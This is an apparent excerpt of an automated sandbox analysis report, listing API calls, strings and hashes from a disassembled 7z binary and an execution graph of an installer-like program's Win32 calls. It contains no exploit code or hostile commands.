                                Similarity
                                • API ID: CompareFileTimememmove
                                • String ID: alternate streams$files$streams
                                • API String ID: 1303509325-806849385
                                Similarity
                                • API ID:
                                • String ID: UNC
                                • API String ID: 0-337201128
                                APIs
                                • fputs.MSVCRT ref: 0045FEC9
                                • free.MSVCRT ref: 0045FEE8
                                  • Part of subcall function 0046B4D0: memset.MSVCRT ref: 0046B515
                                  • Part of subcall function 0046B4D0: fputs.MSVCRT ref: 0046B53A
                                Strings
                                Similarity
                                • API ID: fputs$freememset
                                • String ID: ERROR:
                                • API String ID: 2276422817-977468659
                                APIs
                                • RegQueryValueExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,80000001), ref: 0041C5EA
                                • RegQueryValueExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,80000001), ref: 0041C638
                                Strings
                                Similarity
                                • API ID: QueryValue
                                • String ID: Path64
                                • API String ID: 3660427363-321863482
                                APIs
                                Strings
                                • Cannot open the file as archive, xrefs: 0046408C
                                • Cannot open encrypted archive. Wrong password?, xrefs: 0046404B
                                Similarity
                                • API ID: fputs
                                • String ID: Cannot open encrypted archive. Wrong password?$Cannot open the file as archive
                                • API String ID: 1795875747-1623556331
                                APIs
                                Strings
                                Similarity
                                • API ID: wcscmp
                                • String ID: \??\
                                • API String ID: 3392835482-3047946824
                                APIs
                                • fputs.MSVCRT ref: 004617C9
                                  • Part of subcall function 004124C4: fputc.MSVCRT ref: 004124D5
                                Strings
                                Similarity
                                • API ID: fputcfputs
                                • String ID: Scan$Scanning
                                • API String ID: 269475090-1436252306
                                APIs
                                Strings
                                Similarity
                                • API ID: AllocExceptionStringThrow
                                • String ID: out of memory
                                • API String ID: 3773818493-2599737071
                                APIs
                                • fputs.MSVCRT ref: 0046BAB0
                                  • Part of subcall function 004124C4: fputc.MSVCRT ref: 004124D5
                                Strings
                                Similarity
                                • API ID: fputcfputs
                                • String ID: Scan $Scanning the drive:
                                • API String ID: 269475090-1085461122
                                APIs
                                • free.MSVCRT ref: 0044D4F6
                                • free.MSVCRT ref: 0044D4FE
                                • free.MSVCRT ref: 0044D7E8
                                • free.MSVCRT ref: 0044D7F0
                                  • Part of subcall function 00415A4C: free.MSVCRT ref: 00415A90
                                  • Part of subcall function 00415A4C: free.MSVCRT ref: 00415A98
                                  • Part of subcall function 00415A4C: free.MSVCRT ref: 00415B9C
                                Similarity
                                • API ID: free
                                • String ID:
                                • API String ID: 1294909896-0
                                APIs
                                Similarity
                                • API ID: free$memmove
                                • String ID:
                                • API String ID: 1534225298-0
                                APIs
                                Similarity
                                • API ID: free$memmove
                                • String ID:
                                • API String ID: 1534225298-0
                                APIs
                                Similarity
                                • API ID: free$memmove
                                • String ID:
                                • API String ID: 1534225298-0
                                APIs
                                • EnterCriticalSection.KERNEL32 ref: 0042EBA3
                                • LeaveCriticalSection.KERNEL32 ref: 0042EBAF
                                • EnterCriticalSection.KERNEL32 ref: 0042EC43
                                • LeaveCriticalSection.KERNEL32 ref: 0042EC4F
                                Similarity
                                • API ID: CriticalSection$EnterLeave
                                • String ID:
                                • API String ID: 3168844106-0
                                APIs
                                  • Part of subcall function 00455A44: _CxxThrowException.MSVCRT ref: 00455A74
                                  • Part of subcall function 00455A44: memmove.MSVCRT ref: 00455AAD
                                  • Part of subcall function 00455A44: free.MSVCRT ref: 00455AB5
                                  • Part of subcall function 00412350: malloc.MSVCRT ref: 00412360
                                  • Part of subcall function 00412350: _CxxThrowException.MSVCRT ref: 0041237B
                                • free.MSVCRT ref: 0044D0B2
                                • free.MSVCRT ref: 0044D0BC
                                • free.MSVCRT ref: 0044D0C6
                                • free.MSVCRT ref: 0044D0D0
                                Similarity
                                • API ID: free$ExceptionThrow$mallocmemmove
                                • String ID:
                                • API String ID: 1702027931-0
                                APIs
                                Similarity
                                • API ID: free
                                • String ID:
                                • API String ID: 1294909896-0
                                APIs
                                Similarity
                                • API ID: memcmp
                                • String ID:
                                • API String ID: 1475443563-0
                                APIs
                                Similarity
                                • API ID: memcmp
                                • String ID:
                                • API String ID: 1475443563-0
                                APIs
                                Similarity
                                • API ID: free
                                • String ID:
                                • API String ID: 1294909896-0
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                 • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free
                                • String ID:
                                • API String ID: 1294909896-0
                                • Opcode ID: 7b4fba1c380075a19085162e6bd658fea28b4ac5520fde6bbe94776417234c12
                                • Instruction ID: 6dfca412cdb9b0eb315246fdb34be5c7488d4f5ffe71866d61bb7ae80e66f610
                                • Opcode Fuzzy Hash: 7b4fba1c380075a19085162e6bd658fea28b4ac5520fde6bbe94776417234c12
                                • Instruction Fuzzy Hash: 6CF0BB6374164D498710AE37E9901AD53109F59BE8B5C023AEF1D4B344DEA8CCD38344
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                 • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free
                                • String ID:
                                • API String ID: 1294909896-0
                                • Opcode ID: 8d8b0820cca602ebf3b2a962fd6fd47eb7f6280dff4f65e24150de5827f7fc7a
                                • Instruction ID: 50d66862441bc0142143edf188d56c0d2e8234cc1b5f6a13b875817ff461cc2d
                                • Opcode Fuzzy Hash: 8d8b0820cca602ebf3b2a962fd6fd47eb7f6280dff4f65e24150de5827f7fc7a
                                • Instruction Fuzzy Hash: F1F0B423741A4886C711AE37E9411AD53209BC9FD9B1C422BAE2D9F354DE7CCC928304
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                 • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free
                                • String ID:
                                • API String ID: 1294909896-0
                                • Opcode ID: 11eeaecf133e82959a5403608a25ee7e2b55dc720599b072d793fea8b22b22c9
                                • Instruction ID: afae9fd7ca4b035aa6fd483acd4c2d7952c43c110deaac60b60c544d20524c6c
                                • Opcode Fuzzy Hash: 11eeaecf133e82959a5403608a25ee7e2b55dc720599b072d793fea8b22b22c9
                                • Instruction Fuzzy Hash: 03D0422268050E82CB14AB77E9A20AC13209B99F887541216AE2EDF215CD5CCCE38388

                                Execution Graph

                                Execution Coverage:34.9%
                                Dynamic/Decrypted Code Coverage:0%
                                Signature Coverage:10%
                                Total number of Nodes:1344
                                Total number of Limit Nodes:42
                                 execution_graph: function nodes that resolve to Win32 API calls, listed as function address: API names (node-to-node call edges belong to the rendered graph view)

                                 File system and I/O
                                 • 401617, 405f7c, 406008: GetFileAttributesW
                                 • 40602d: GetFileAttributesW CreateFileW
                                 • 40601a, 405c3a: SetFileAttributesW
                                 • 4016d2: GetFullPathNameW
                                 • 401723, 4061d9: GetShortPathNameW
                                 • 4061bd: CloseHandle GetShortPathNameW
                                 • 405a6e, 405aeb: CreateDirectoryW
                                 • 405ace: SetFileSecurityW
                                 • 405c1c: RemoveDirectoryW
                                 • 402a42, 405c24, 405c71: DeleteFileW
                                 • 401694: MoveFileW
                                 • 4062fd: MoveFileExW
                                 • 40236f: SHFileOperationW
                                 • 402912, 406873: FindFirstFileW
                                 • 405ce2: lstrlenW FindFirstFileW
                                 • 4028ea, 405d8b: FindNextFileW
                                 • 4028d2, 405da1, 406889: FindClose
                                 • 4017cd: CompareFileTime
                                 • 4018be: SetFileTime
                                 • 40623a: GetFileSize GlobalAlloc
                                 • 402745, 4034cf, 4060b0: ReadFile
                                 • 4060df: WriteFile
                                 • 4028ae, 40286c, 4034e5, 40610e, 40614b, 406173, 4062d4: SetFilePointer
                                 • 4027ab: SetFilePointer MultiByteToWideChar
                                 • 404bb8: GetDiskFreeSpaceW
                                 • 402416: GetPrivateProfileStringW
                                 • 4018d0, 401f9f, 402a30, 403b1c, 4062f1: CloseHandle

                                 Registry
                                 • 4063c2: RegOpenKeyExW
                                 • 40643f: RegQueryValueExW RegCloseKey
                                 • 4063f2: RegCreateKeyExW
                                 • 402509: RegSetValueExW
                                 • 40251f: RegCloseKey

                                 Process, thread and library loading
                                 • 40690a: GetModuleHandleA
                                 • 402102: GetModuleHandleW
                                 • 406930, 40699d: GetProcAddress
                                 • 4068bc: wsprintfW LoadLibraryExW
                                 • 402110: LoadLibraryExW
                                 • 40218e: FreeLibrary
                                 • 403b6a: FreeLibrary GlobalFree
                                 • 405891: GetDlgItem CreateThread CloseHandle
                                 • 4014dd: Sleep
                                 • 402151, 4044bb: KiUserCallbackDispatcher

                                 Shell and COM
                                 • 405b63: ShellExecuteExW
                                 • 4066d1: SHGetSpecialFolderLocation
                                 • 4066e9: SHGetPathFromIDListW CoTaskMemFree
                                 • 404d12: SHGetPathFromIDListW
                                 • 404aa6: SHBrowseForFolderW
                                 • 402beb, 404abe: CoTaskMemFree
                                 • 402bbf: IIDFromString
                                 • 40668f, 40689a: GetSystemDirectoryW
                                 • 4066a2: GetWindowsDirectoryW

                                 Clipboard
                                 • 4059ff: OpenClipboard EmptyClipboard GlobalAlloc GlobalLock
                                 • 405a4d: GlobalUnlock SetClipboardData CloseClipboard

                                 Window, dialog and GDI
                                 • 401ce1: FindWindowExW
                                 • 401ca5: SendMessageTimeoutW
                                 • 401cc3, 402c05, 404472, 4044ce, 4044e5, 404718, 404897, 4048ad, 4048f6, 404cfd, 404d29, 404e54, 404eb3, 404ff2, 4050b7, 4050f5, 405109, 405251, 4052b8, 4052cd, 4052f1, 405315, 4053af, 4057e9, 405952, 4059e2, 405a24: SendMessageW
                                 • 405021, 405439, 4057c8, 40586b: SendMessageW SendMessageW
                                 • 40473e: SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW
                                 • 404e77: GetMessagePos ScreenToClient SendMessageW
                                 • 4013cb: MulDiv SendMessageW
                                 • 405776: GetClientRect GetSystemMetrics SendMessageW SendMessageW
                                 • 405585: CallWindowProcW
                                 • 40100c: DefWindowProcW
                                 • 401037: BeginPaint GetClientRect
                                 • 401167: EndPaint
                                 • 401073: CreateBrushIndirect FillRect DeleteObject
                                 • 4045b6: CreateBrushIndirect
                                 • 401102, 401ece: CreateFontIndirectW
                                 • 401e4e: GetDC
                                 • 401e60: GetDeviceCaps MulDiv ReleaseDC
                                 • 401dd5: GetClientRect LoadImageW SendMessageW
                                 • 401e38, 4045af, 404fff: DeleteObject
                                 • 402c1f, 405496: InvalidateRect
                                 • 401d1d: IsWindow
                                 • 40553f: IsWindowVisible
                                 • 4014f5: SetForegroundWindow
                                 • 403fc9: SetWindowPos
                                 • 40414e: SetClassLongW
                                 • 401d6e: SetWindowLongW
                                 • 404518: GetWindowLongW
                                 • 40513f: GetWindowLongW SetWindowLongW
                                 • 402fa5: SetTimer
                                 • 402fd8: MulDiv wsprintfW SetWindowTextW SetDlgItemTextW
                                 • 4049fb, 405605: SetWindowTextW
                                 • 4044a4, 404960, 404b02, 404c76: SetDlgItemTextW
                                 • 404de4: lstrlenW wsprintfW SetDlgItemTextW
                                 • 405b81: GetDlgItemTextW
                                 • 401d94, 404702, 4047fe, 4049d3: GetDlgItem
                                 • 404124, 404f06: GetDlgItem GetDlgItem
                                 • 4056ff: GetDlgItem GetDlgItem GetDlgItem
                                 • 4047c5, 405844: GetDlgItem SendMessageW
                                 • 4046e4: CheckDlgButton
                                 • 40483e: SendMessageW LoadCursorW SetCursor
                                 • 40486d: LoadCursorW SetCursor
                                 • 401583, 40159a, 403fe5, 40515d, 405810, 405826, 40591e: ShowWindow
                                 • 4058d0: ShowWindow ShowWindow
                                 • 4054d2: ShowWindow GetDlgItem ShowWindow
                                 • 40596b: CreatePopupMenu
                                 • 40597b: AppendMenuW
                                 • 405998: GetWindowRect
                                 • 4059ab: TrackPopupMenu
                                 • 40455a, 404585, 404735: GetSysColor
                                 • 404563: SetTextColor
                                 • 40456d: SetBkMode
                                 • 404592: SetBkColor
                                 • 40532f: ImageList_Destroy
                                 • 405b9d: MessageBoxIndirectW
                                 • 403318, 4033bd: GetTickCount
                                 • 4033e2: MulDiv wsprintfW
                                 • 404bdc: MulDiv

                                 String, memory and error helpers
                                 • 40653d: lstrcpynW
                                 • 4045cf: lstrcpynW lstrlenW
                                 • 40195d, 401993, 4019da, 4024d4, 404609, 4055d6, 4055e4, 405e58, 405f6c, 406778: lstrlenW
                                 • 402331: lstrlenW lstrlenW
                                 • 405e0c: lstrlenW CharPrevW
                                 • 4017af, 4018ee, 404afb, 4055f6, 405cb4, 405cd7, 405e28, 406719: lstrcatW
                                 • 401a16, 404aea: lstrcmpiW
                                 • 401a28: lstrcmpW
                                 • 40627b: lstrcpyA
                                 • 405f92, 405fd3: lstrlenA
                                 • 405fac: lstrcmpiA
                                 • 405fca: CharNextA
                                 • 4061f6: wsprintfA
                                 • 401b87, 406484: wsprintfW
                                 • 405e39, 405e46, 405ee1, 406826, 406835, 40683a: CharNextW
                                 • 405eb7: CharNextW CharNextW
                                 • 405e6c, 40684c: CharPrevW
                                 • 402785: MultiByteToWideChar
                                 • 40462a, 40655f: WideCharToMultiByte
                                 • 4029a0, 4029c8: GlobalAlloc
                                 • 402a03, 402a18, 40533f, 4060fd: GlobalFree
                                 • 405abf, 405ae4, 405aff: GetLastError

                                 Nodes shown only with an aggregate call count
                                 • 405c49 (60, 67 API calls), 4062fd (36), 4032b4 (31), 401423 (24), 40559f (24), 404d46 (20), 404e0f (20), 404499 (18), 405f14 (18), 402d84 (17), 402da6 (17), 40657a (17), 404500 (8), 404f58 (7), 401112 (6), 4067c4 (5), 40690a (5), 4069b5 (5), 405672 (5), 405c01 (5), 405eb7 (4), 405e0c (3), 401389 (2), 40140b (2), 40605c (2), 405e58 (2), 406008 (2), 406873 (2)
3812->3844 3817 4040d1 3813->3817 3818 404005 GetWindowLongW 3813->3818 3819 404046 3814->3819 3820 40402f DestroyWindow 3814->3820 3821 40140b 2 API calls 3815->3821 3823 404500 8 API calls 3817->3823 3818->3817 3824 40401e ShowWindow 3818->3824 3826 40404b SetWindowLongW 3819->3826 3827 40405c 3819->3827 3825 404422 3820->3825 3821->3806 3828 404196 3822->3828 3823->3816 3824->3814 3825->3816 3833 404453 ShowWindow 3825->3833 3826->3816 3827->3817 3831 404068 GetDlgItem 3827->3831 3828->3811 3832 40419a SendMessageW 3828->3832 3829 40140b 2 API calls 3829->3844 3830 404424 DestroyWindow KiUserCallbackDispatcher 3830->3825 3834 404096 3831->3834 3835 404079 SendMessageW IsWindowEnabled 3831->3835 3832->3816 3833->3816 3837 4040a3 3834->3837 3838 4040ea SendMessageW 3834->3838 3839 4040b6 3834->3839 3847 40409b 3834->3847 3835->3816 3835->3834 3836 40657a 17 API calls 3836->3844 3837->3838 3837->3847 3838->3817 3842 4040d3 3839->3842 3843 4040be 3839->3843 3841 404499 18 API calls 3841->3844 3846 40140b 2 API calls 3842->3846 3845 40140b 2 API calls 3843->3845 3844->3816 3844->3829 3844->3830 3844->3836 3844->3841 3848 404499 18 API calls 3844->3848 3864 404364 DestroyWindow 3844->3864 3845->3847 3846->3847 3847->3817 3876 404472 3847->3876 3849 40424b GetDlgItem 3848->3849 3850 404260 3849->3850 3851 404268 ShowWindow KiUserCallbackDispatcher 3849->3851 3850->3851 3873 4044bb KiUserCallbackDispatcher 3851->3873 3853 404292 KiUserCallbackDispatcher 3858 4042a6 3853->3858 3854 4042ab GetSystemMenu EnableMenuItem SendMessageW 3855 4042db SendMessageW 3854->3855 3854->3858 3855->3858 3857 403f7b 18 API calls 3857->3858 3858->3854 3858->3857 3874 4044ce SendMessageW 3858->3874 3875 40653d lstrcpynW 3858->3875 3860 40430a lstrlenW 3861 40657a 17 API calls 3860->3861 3862 404320 SetWindowTextW 3861->3862 3863 401389 2 API calls 3862->3863 3863->3844 3864->3825 3865 40437e CreateDialogParamW 3864->3865 3865->3825 3866 4043b1 3865->3866 3867 404499 18 API calls 3866->3867 
3868 4043bc GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3867->3868 3869 401389 2 API calls 3868->3869 3870 404402 3869->3870 3870->3816 3871 40440a ShowWindow 3870->3871 3872 4044e5 SendMessageW 3871->3872 3872->3825 3873->3853 3874->3858 3875->3860 3877 404479 3876->3877 3878 40447f SendMessageW 3876->3878 3877->3878 3878->3817 3879 401b9b 3880 401ba8 3879->3880 3881 401bec 3879->3881 3884 401c31 3880->3884 3889 401bbf 3880->3889 3882 401bf1 3881->3882 3883 401c16 GlobalAlloc 3881->3883 3895 40239d 3882->3895 3900 40653d lstrcpynW 3882->3900 3886 40657a 17 API calls 3883->3886 3885 40657a 17 API calls 3884->3885 3884->3895 3887 402397 3885->3887 3886->3884 3892 405b9d MessageBoxIndirectW 3887->3892 3898 40653d lstrcpynW 3889->3898 3890 401c03 GlobalFree 3890->3895 3892->3895 3893 401bce 3899 40653d lstrcpynW 3893->3899 3896 401bdd 3901 40653d lstrcpynW 3896->3901 3898->3893 3899->3896 3900->3890 3901->3895 4356 40261c 4357 402da6 17 API calls 4356->4357 4358 402623 4357->4358 4361 40602d GetFileAttributesW CreateFileW 4358->4361 4360 40262f 4361->4360 3964 40259e 3965 402de6 17 API calls 3964->3965 3966 4025a8 3965->3966 3967 402d84 17 API calls 3966->3967 3968 4025b1 3967->3968 3969 40292e 3968->3969 3970 4025d9 RegEnumValueW 3968->3970 3971 4025cd RegEnumKeyW 3968->3971 3972 4025ee 3970->3972 3973 4025f5 RegCloseKey 3970->3973 3971->3973 3972->3973 3973->3969 4362 40149e 4363 4014ac PostQuitMessage 4362->4363 4364 40239d 4362->4364 4363->4364 4365 4015a3 4366 402da6 17 API calls 4365->4366 4367 4015aa SetFileAttributesW 4366->4367 4368 4015bc 4367->4368 3168 401fa4 3169 402da6 17 API calls 3168->3169 3170 401faa 3169->3170 3171 40559f 24 API calls 3170->3171 3172 401fb4 3171->3172 3181 405b20 CreateProcessW 3172->3181 3175 401fdd CloseHandle 3178 40292e 3175->3178 3179 401fcf 3179->3175 3189 406484 wsprintfW 3179->3189 3182 405b53 CloseHandle 3181->3182 3183 401fba 3181->3183 3182->3183 3183->3175 3183->3178 3184 4069b5 WaitForSingleObject 3183->3184 
3185 4069cf 3184->3185 3186 4069e1 GetExitCodeProcess 3185->3186 3190 406946 3185->3190 3186->3179 3189->3175 3191 406963 PeekMessageW 3190->3191 3192 406973 WaitForSingleObject 3191->3192 3193 406959 DispatchMessageW 3191->3193 3192->3185 3193->3191 3352 4021aa 3353 402da6 17 API calls 3352->3353 3354 4021b1 3353->3354 3355 402da6 17 API calls 3354->3355 3356 4021bb 3355->3356 3357 402da6 17 API calls 3356->3357 3358 4021c5 3357->3358 3359 402da6 17 API calls 3358->3359 3360 4021cf 3359->3360 3361 402da6 17 API calls 3360->3361 3362 4021d9 3361->3362 3363 402218 CoCreateInstance 3362->3363 3364 402da6 17 API calls 3362->3364 3367 402237 3363->3367 3364->3363 3365 401423 24 API calls 3366 4022f6 3365->3366 3367->3365 3367->3366 3368 40252a 3379 402de6 3368->3379 3371 402da6 17 API calls 3372 40253d 3371->3372 3373 402548 RegQueryValueExW 3372->3373 3378 40292e 3372->3378 3374 40256e RegCloseKey 3373->3374 3375 402568 3373->3375 3374->3378 3375->3374 3384 406484 wsprintfW 3375->3384 3380 402da6 17 API calls 3379->3380 3381 402dfd 3380->3381 3382 4063aa RegOpenKeyExW 3381->3382 3383 402534 3382->3383 3383->3371 3384->3374 4369 40202a 4370 402da6 17 API calls 4369->4370 4371 402031 4370->4371 4372 40690a 5 API calls 4371->4372 4373 402040 4372->4373 4374 40205c GlobalAlloc 4373->4374 4377 4020cc 4373->4377 4375 402070 4374->4375 4374->4377 4376 40690a 5 API calls 4375->4376 4378 402077 4376->4378 4379 40690a 5 API calls 4378->4379 4380 402081 4379->4380 4380->4377 4384 406484 wsprintfW 4380->4384 4382 4020ba 4385 406484 wsprintfW 4382->4385 4384->4382 4385->4377 4386 403baa 4387 403bb5 4386->4387 4388 403bbc GlobalAlloc 4387->4388 4389 403bb9 4387->4389 4388->4389 3395 40352d SetErrorMode GetVersionExW 3396 4035b7 3395->3396 3397 40357f GetVersionExW 3395->3397 3398 403610 3396->3398 3399 40690a 5 API calls 3396->3399 3397->3396 3400 40689a 3 API calls 3398->3400 3399->3398 3401 403626 lstrlenA 3400->3401 3401->3398 3402 403636 3401->3402 3403 40690a 5 API calls 
3402->3403 3404 40363d 3403->3404 3405 40690a 5 API calls 3404->3405 3406 403644 3405->3406 3407 40690a 5 API calls 3406->3407 3411 403650 #17 OleInitialize SHGetFileInfoW 3407->3411 3410 40369d GetCommandLineW 3486 40653d lstrcpynW 3410->3486 3485 40653d lstrcpynW 3411->3485 3413 4036af 3414 405e39 CharNextW 3413->3414 3415 4036d5 CharNextW 3414->3415 3427 4036e6 3415->3427 3416 4037e4 3417 4037f8 GetTempPathW 3416->3417 3487 4034fc 3417->3487 3419 403810 3421 403814 GetWindowsDirectoryW lstrcatW 3419->3421 3422 40386a DeleteFileW 3419->3422 3420 405e39 CharNextW 3420->3427 3423 4034fc 12 API calls 3421->3423 3497 40307d GetTickCount GetModuleFileNameW 3422->3497 3425 403830 3423->3425 3425->3422 3428 403834 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 3425->3428 3426 40387d 3430 403a59 ExitProcess CoUninitialize 3426->3430 3432 403932 3426->3432 3440 405e39 CharNextW 3426->3440 3427->3416 3427->3420 3429 4037e6 3427->3429 3431 4034fc 12 API calls 3428->3431 3581 40653d lstrcpynW 3429->3581 3434 403a69 3430->3434 3435 403a7e 3430->3435 3439 403862 3431->3439 3525 403bec 3432->3525 3586 405b9d 3434->3586 3437 403a86 GetCurrentProcess OpenProcessToken 3435->3437 3438 403afc ExitProcess 3435->3438 3443 403acc 3437->3443 3444 403a9d LookupPrivilegeValueW AdjustTokenPrivileges 3437->3444 3439->3422 3439->3430 3454 40389f 3440->3454 3447 40690a 5 API calls 3443->3447 3444->3443 3445 403941 3445->3430 3450 403ad3 3447->3450 3448 403908 3451 405f14 18 API calls 3448->3451 3449 403949 3453 405b08 5 API calls 3449->3453 3452 403ae8 ExitWindowsEx 3450->3452 3456 403af5 3450->3456 3455 403914 3451->3455 3452->3438 3452->3456 3457 40394e lstrcatW 3453->3457 3454->3448 3454->3449 3455->3430 3582 40653d lstrcpynW 3455->3582 3460 40140b 2 API calls 3456->3460 3458 40396a lstrcatW lstrcmpiW 3457->3458 3459 40395f lstrcatW 3457->3459 3458->3445 3461 40398a 3458->3461 3459->3458 3460->3438 3463 403996 3461->3463 3464 40398f 3461->3464 3467 405aeb 2 API calls 
3463->3467 3466 405a6e 4 API calls 3464->3466 3465 403927 3583 40653d lstrcpynW 3465->3583 3469 403994 3466->3469 3470 40399b SetCurrentDirectoryW 3467->3470 3469->3470 3471 4039b8 3470->3471 3472 4039ad 3470->3472 3585 40653d lstrcpynW 3471->3585 3584 40653d lstrcpynW 3472->3584 3475 40657a 17 API calls 3476 4039fa DeleteFileW 3475->3476 3477 403a06 CopyFileW 3476->3477 3482 4039c5 3476->3482 3477->3482 3478 403a50 3480 4062fd 36 API calls 3478->3480 3479 4062fd 36 API calls 3479->3482 3480->3445 3481 40657a 17 API calls 3481->3482 3482->3475 3482->3478 3482->3479 3482->3481 3483 405b20 2 API calls 3482->3483 3484 403a3a CloseHandle 3482->3484 3483->3482 3484->3482 3485->3410 3486->3413 3488 4067c4 5 API calls 3487->3488 3490 403508 3488->3490 3489 403512 3489->3419 3490->3489 3491 405e0c 3 API calls 3490->3491 3492 40351a 3491->3492 3493 405aeb 2 API calls 3492->3493 3494 403520 3493->3494 3590 40605c 3494->3590 3594 40602d GetFileAttributesW CreateFileW 3497->3594 3499 4030bd 3517 4030cd 3499->3517 3595 40653d lstrcpynW 3499->3595 3501 4030e3 3502 405e58 2 API calls 3501->3502 3503 4030e9 3502->3503 3596 40653d lstrcpynW 3503->3596 3505 4030f4 GetFileSize 3506 4031ee 3505->3506 3524 40310b 3505->3524 3597 403019 3506->3597 3508 4031f7 3510 403227 GlobalAlloc 3508->3510 3508->3517 3609 4034e5 SetFilePointer 3508->3609 3509 4034cf ReadFile 3509->3524 3608 4034e5 SetFilePointer 3510->3608 3512 40325a 3514 403019 6 API calls 3512->3514 3514->3517 3515 403210 3518 4034cf ReadFile 3515->3518 3516 403242 3519 4032b4 31 API calls 3516->3519 3517->3426 3520 40321b 3518->3520 3522 40324e 3519->3522 3520->3510 3520->3517 3521 403019 6 API calls 3521->3524 3522->3517 3522->3522 3523 40328b SetFilePointer 3522->3523 3523->3517 3524->3506 3524->3509 3524->3512 3524->3517 3524->3521 3526 40690a 5 API calls 3525->3526 3527 403c00 3526->3527 3528 403c06 3527->3528 3529 403c18 3527->3529 3625 406484 wsprintfW 3528->3625 3530 40640b 3 API calls 3529->3530 3531 403c48 3530->3531 
3532 403c67 lstrcatW 3531->3532 3534 40640b 3 API calls 3531->3534 3535 403c16 3532->3535 3534->3532 3610 403ec2 3535->3610 3538 405f14 18 API calls 3539 403c99 3538->3539 3540 403d2d 3539->3540 3542 40640b 3 API calls 3539->3542 3541 405f14 18 API calls 3540->3541 3543 403d33 3541->3543 3544 403ccb 3542->3544 3545 403d43 LoadImageW 3543->3545 3548 40657a 17 API calls 3543->3548 3544->3540 3552 403cec lstrlenW 3544->3552 3556 405e39 CharNextW 3544->3556 3546 403de9 3545->3546 3547 403d6a RegisterClassW 3545->3547 3551 40140b 2 API calls 3546->3551 3549 403da0 SystemParametersInfoW CreateWindowExW 3547->3549 3550 403df3 3547->3550 3548->3545 3549->3546 3550->3445 3555 403def 3551->3555 3553 403d20 3552->3553 3554 403cfa lstrcmpiW 3552->3554 3559 405e0c 3 API calls 3553->3559 3554->3553 3558 403d0a GetFileAttributesW 3554->3558 3555->3550 3561 403ec2 18 API calls 3555->3561 3557 403ce9 3556->3557 3557->3552 3560 403d16 3558->3560 3562 403d26 3559->3562 3560->3553 3563 405e58 2 API calls 3560->3563 3564 403e00 3561->3564 3626 40653d lstrcpynW 3562->3626 3563->3553 3566 403e0c ShowWindow 3564->3566 3567 403e8f 3564->3567 3569 40689a 3 API calls 3566->3569 3618 405672 OleInitialize 3567->3618 3571 403e24 3569->3571 3570 403e95 3572 403eb1 3570->3572 3573 403e99 3570->3573 3574 403e32 GetClassInfoW 3571->3574 3578 40689a 3 API calls 3571->3578 3577 40140b 2 API calls 3572->3577 3573->3550 3580 40140b 2 API calls 3573->3580 3575 403e46 GetClassInfoW RegisterClassW 3574->3575 3576 403e5c DialogBoxParamW 3574->3576 3575->3576 3579 40140b 2 API calls 3576->3579 3577->3550 3578->3574 3579->3550 3580->3550 3581->3417 3582->3465 3583->3432 3584->3471 3585->3482 3587 405bb2 3586->3587 3588 405bc6 MessageBoxIndirectW 3587->3588 3589 403a76 ExitProcess 3587->3589 3588->3589 3591 406069 GetTickCount GetTempFileNameW 3590->3591 3592 40352b 3591->3592 3593 40609f 3591->3593 3592->3419 3593->3591 3593->3592 3594->3499 3595->3501 3596->3505 3598 403022 3597->3598 3599 40303a 3597->3599 
